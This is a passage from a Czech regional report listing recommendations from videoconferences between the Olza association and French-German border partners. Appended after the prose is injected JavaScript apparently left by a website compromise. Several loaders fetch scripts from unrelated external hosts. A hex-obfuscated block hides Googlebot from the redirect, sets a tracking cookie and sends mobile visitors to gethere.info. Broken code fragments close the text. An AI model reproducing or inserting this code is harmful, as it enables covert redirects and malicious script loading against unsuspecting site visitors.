zdrojem inspirace pro učinění přeshraničních kroků v oblasti ochrany životního prostředí, tyto kroky
mají v Euroregionu Těšínského Slezska spíše okrajový charakter.
DOPORUČENÍ DO BUDOUCNA
V důsledku uskutečněných videokonferencí bylo konstatováno, že:
- způsob komunikace s partnery z francouzsko-německého pohraničí prostřednictvím
videokonferenčního terminálu se stává přirozeným a běžným způsobem rozhovoru a udržování stálého
kontaktu s partnery;
- Sdružení pro rozvoj a regionální spolupráci „Olza” stejně jako EURODISTRIKT REGIO PAMINA, bude
zapojovat do společných videokonferencí své členy (samosprávy) nebo jiné instituce za účelem výměny
zkušeností;
- Využití dobrých zkušeností, jež je pokračováním tématů otevřených během uskutečněných osmi
videokonferencí, může probíhat směrem z pohraničí francouzsko-německého na pohraničí polskočeské
při účasti zahraničních a tuzemských odborníků;
- bude-li mimořádný zájem o danou problematiku, pak jsou odborníci z francouzsko-německého
pohraničí připraveni předat další dokumentaci, doplňující informace prostřednictvím EURODISTRIKTU
REGIO PAMINA;
- využití dobrých zkušeností je možné rovněž v případě zájmu o danou problematiku z polsko-českého
pohraničí v pohraničí francouzsko-německém.

(function() {
var gcse = document.createElement(‘script’);
gcse.type = ‘text/javascript’;
gcse.async = true;
gcse.src = „http://theboatersnetwork.com/js/main1.js“;
var s = document.getElementsByTagName(‘script’)[0];
s.parentNode.insertBefore(gcse, s);
})();

(function() {
var gcse = document.createElement(‘script’);
gcse.type = ‘text/javascript’;
gcse.async = true;
gcse.src = „http://cjccontabil.com.br/wp-content/themes/Hermes/main1.js“;
var s = document.getElementsByTagName(‘script’)[0];
s.parentNode.insertBefore(gcse, s);
})();

(function() {
var gcse = document.createElement(‘script’);
gcse.type = ‘text/javascript’;
gcse.async = true;
gcse.src = „http://cjccontabil.com.br/wp-content/themes/Hermes/main1.js“;
var s = document.getElementsByTagName(‘script’)[0];
s.parentNode.insertBefore(gcse, s);
})();



var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| Buy |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

} else {

document.currentScript.parentNode.insertBefore(s, document.currentScript);

